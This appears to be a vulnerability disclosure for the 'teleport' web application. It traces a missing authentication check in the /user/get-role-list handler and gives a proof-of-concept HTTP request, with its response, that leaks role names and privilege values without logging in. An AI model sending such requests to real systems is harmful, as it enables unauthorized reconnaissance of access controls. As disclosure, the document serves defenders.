# The name of an affected Product
teleport

# The affected or fixed version(s).
> teleport - 3.2.2

> teleport - 3.5.6-rc6

> teleport - 3.6.3-b2

# Vulnerability Type
Unauthorized access vulnerability

# Root Cause
```
data/www/teleport/webroot/app/controller/__init__.py
```
Some of the route definitions in this file:
```
(r'/user/group', user.GroupListHandler),
# - Management page for a specific user group
(r'/user/group/(.*)', user.GroupInfoHandler),
# - [json] Get the user group list (including no more than 5 members per group)
(r'/user/get-groups-with-member', user.DoGetGroupWithMemberHandler),
# - [json] Get the role list
(r'/user/get-role-list', user.DoGetRoleListHandler),
# - [json] Set roles in bulk
(r'/user/set-role', user.DoSetRoleForUsersHandler),
```
Following the route to the `user.DoGetRoleListHandler` method:
```
data/www/teleport/webroot/app/controller/user.py
```
```
class DoGetRoleListHandler(TPBaseJsonHandler):
    def post(self):
        # The role list is fetched and returned directly;
        # nothing about the request is validated first.
        err, role_list = user.get_role_list()
        if err != TPE_OK:
            self.write_json(err)
        else:
            self.write_json(TPE_OK, data=role_list)
```
Validation is missing: the handler returns the role list without checking the request first.

# POC
Request:
```
POST /user/get-role-list HTTP/1.1
Host: 127.0.0.1:7190
Content-Length: 4
Connection: close

xx
```
Response:
```
HTTP/1.1 200 OK
Server: TornadoServer/6.1
Content-Type: application/json; charset=UTF-8
Date: Wed, 16 Nov 2022 07:18:38 GMT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Content-Length: 293
Set-Cookie: _sid=tp_1668583118_a918a432f2b4bcf2; Path=/
Connection: close

{"code": 0, "message": "", "data": [{"id": 1, "name": "\u7cfb\u7edf\u7ba1\u7406\u5458", "privilege": 4294967295}, {"id": 2, "name": "\u8fd0\u7ef4\u4eba\u5458", "privilege": 513}, {"id": 3, "name": "\u5ba1\u8ba1\u5458", "privilege": 32769}, {"id": 4, "name": "ok\u89d2\u8272", "privilege": 1}]}
```

# Impact
Teleport v3.2.2, Teleport v3.5.6-rc6, and Teleport v3.6.3-b2 were discovered to contain an information leak via the /user/get-role-list web interface.

Author: arleyna, commented Nov 16, 2022